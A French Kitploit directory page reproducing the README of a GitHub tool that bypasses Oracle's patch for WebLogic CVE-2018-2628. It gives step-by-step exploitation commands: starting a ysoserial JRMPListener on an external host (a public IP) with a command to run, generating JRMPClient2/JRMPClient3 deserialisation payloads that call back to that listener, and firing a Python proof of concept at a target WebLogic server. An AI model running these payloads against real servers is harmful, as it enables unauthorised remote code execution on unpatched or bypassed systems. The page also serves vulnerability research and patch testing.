Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ysoserial-cve-2018-2628 — Quelques codes pour contourner le patch CVE-2018-2628 d'Oracle WebLogic | Kitploit
Outils/GitHubGitHub/tdy218/ysoserial-cve-2018-2628
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubtdy218/ysoserial-cve-2018-2628

ysoserial-cve-2018-2628

Quelques codes pour contourner le patch CVE-2018-2628 d'Oracle WebLogic

Voir le dépôt
11448il y a 8 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ysoserial-cve-2018-2628

0x1. Préparation

  • Préparer l'environnement logiciel nécessaire pour le script POC, la génération d'objets Payload et l'exécution de JRMPListener
    Python 2.7.x
    Oracle Java SE 1.7+
  • Préparer un environnement WebLogic Server 10.3.6 avec le Patch Set Update 180417 installé (un AdminServer suffit)
    Si vous disposez déjà d'un environnement WebLogic avec cette version du PSU installée, vous pouvez ignorer cette étape.
  • Préparer les outils POC
    Téléchargez le script POC (wls-cve-2018-2628-poc.py) depuis ce projet.
    Téléchargez le fichier jar du générateur d'objets Payload et du programme JRMPListener depuis la page release de ce projet (ysoserial-<version>-cve-2018-2628-all.jar)

0x2. Exécuter JRMPListener

Format de la commande :

java -cp ysoserial-<version>-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener <listen port> <gadget class> <command>

Par exemple :

java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 22801 Jdk7u21 "calc.exe"

Lorsque vous voyez la sortie *Opening JRMP listener on 22801, notez l'adresse IP de l'hôte où tourne JRMPListener (dans l'exemple, il s'agit d'un hôte Alibaba Cloud ECS avec l'IP publique 47.94.158.125) ainsi que le port spécifié.

0x3. Générer la chaîne Payload à partir de l'adresse IP de l'hôte JRMPListener et du port d'écoute de l'étape précédente

Deux méthodes sont actuellement connues (pour générer la Payload Object String, choisissez l'une des deux méthodes ci-dessous) :

  • En utilisant java.rmi.activation.Activator[CVE-2017-3248]

Format de commande pour générer la Payload Object String :

java -jar ysoserial-<version>-cve-2018-2628-all.jar JRMPClient2 <JRMPListener IP>:<JRMPListener Port> | xxd -p | tr -d $'\n' && echo

Par exemple :

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 47.94.158.125:22801 | xxd -p | tr -d $'\n' && echo

Exemple (données de sortie binaires de l'objet Payload généré avec JRMPClient2) :

  • En utilisant weblogic.jms.common.StreamMessageImpl pour encapsuler java.rmi.registry.Registry

Format de commande pour générer la Payload Object String :

java -jar ysoserial-<version>-cve-2018-2628-all.jar JRMPClient3 <JRMPListener IP>:<JRMPListener Port> | xxd -p | tr -d $'\n' && echo

Par exemple :

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient3 47.94.158.125:22801 | xxd -p | tr -d $'\n' && echo

Exemple (données de sortie binaires de l'objet Payload généré avec JRMPClient3) :

0x4. Modifier et exécuter le script POC

Modifiez wls-cve-2018-2628-poc.py, remplacez la valeur de la variable nommée payload_str en haut du script par la chaîne hex générée à l'étape précédente (les deux valeurs de variable payload_str incluses dans ce script peuvent être utilisées directement, correspondant respectivement aux chaînes hex générées par les deux méthodes ci-dessus).

Format de la commande :

python wls-cve-2018-2628-poc.py <目标WebLogic Server实例监听IP> <目标WebLogic Server实例监听端口>

Par exemple :

python wls-cve-2018-2628-poc.py 192.168.64.83 7001

Exemple (avec le Patch Set Update 180417 installé) :

0x5. Remerciements

xxlegend@nsfocus (l'un des découvreurs et soumetteurs de la vulnérabilité CVE-2018-2628, a révélé la méthode d'exploitation et des exemples de code associés)
badcode@knownsec (a fourni l'exemple de code encapsulant java.rmi.registry.Registry avec weblogic.jms.common.StreamMessageImpl)
ysoserial project (rassemble de nombreux utilitaires d'exploitation pour la désérialisation Java)

Télécharger l’outil